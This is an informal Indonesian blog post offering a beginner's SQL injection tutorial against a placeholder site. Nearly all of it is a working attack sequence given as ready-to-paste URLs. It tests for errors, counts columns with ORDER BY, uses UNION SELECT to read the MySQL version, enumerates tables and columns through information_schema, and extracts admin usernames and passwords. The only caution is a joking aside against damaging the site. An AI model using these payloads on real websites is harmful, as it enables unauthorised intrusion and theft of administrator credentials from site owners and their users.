.jpg)
Postingan
Hari ini Gw pingin sekali corat-coret tapi berhubung kamar Gw udah penuh coretan jadi Gw Corat-coret di blog aza ah….he…he…. Apa yac?? Jadi bingung, oya Gw kasih SQL Injection versi Pemula Gw post lagi ah ga pa2 lah …….biar orang Indonesia makin pinter he…he… Langsung aja yuk “SELAMAT MENYAKSIKAN”
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.contoh.com/berita.php?id=120
2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
Contoh :
http://www.contoh.com/berita.php?id=120'
atau
http://www.contoh.com/berita.php?id=120
4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by
Contoh :
http://www.contoh.com/berita.php?id=120+order+by+1/*
Wekkk… apaan Tuc?? “KUIS DANGDUT” he…he… "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja..yang penting dah tau kan??
Kalo "+" sebagai penghubung perintah...
6. Nah sampe sini langsung dah nyobain satu2...
http://www.contoh.com/berita.php?id=120+order+by+1/* (gak ada error)
http://www.contoh.com/berita.php?id=120+order+by+2/* (gak ada juga)
http://www.contoh.com/berita.php?id=120+order+by+3/* (capek dah)
http://www.contoh.com/berita.php?id=120+order+by+4/* (jangan nyerah)
Sampai muncul error...
Misalkan errornya disini...
http://www.contoh.com/berita.php?id=120+order+by+10/*
Berarti yang kita ambil adalah "9"
http://www.contoh.com/berita.php?id=120+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.contoh.com/berita.php?id=120+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Inget bukan togel nic)
8. Misalnya angka yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"
http://www.contoh.com/berita.php?id=120+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.contoh.com/berita.php?id=120+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...
Contoh :
http://www.contoh.com/berita.php?id=120+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi ni pengalaman pribadi Gw yah so kalo salah maaf……sekali lagi namanya juga belajar. Next ah
Misalnya yang lo liat adalah table "admin"
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...
Contoh:
http://www.contoh.com/berita.php?id=120+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...
Contoh :
http://www.contoh.com/berita.php?id=120+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.contoh.com/berita.php?id=120+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Beres dec…..Sekarang terserah mau di gimanain yang pasti jangan ampe dirusak aja ya…..Tau ga kenapa?? Soalnya kata nenek itu berbahaya he….he…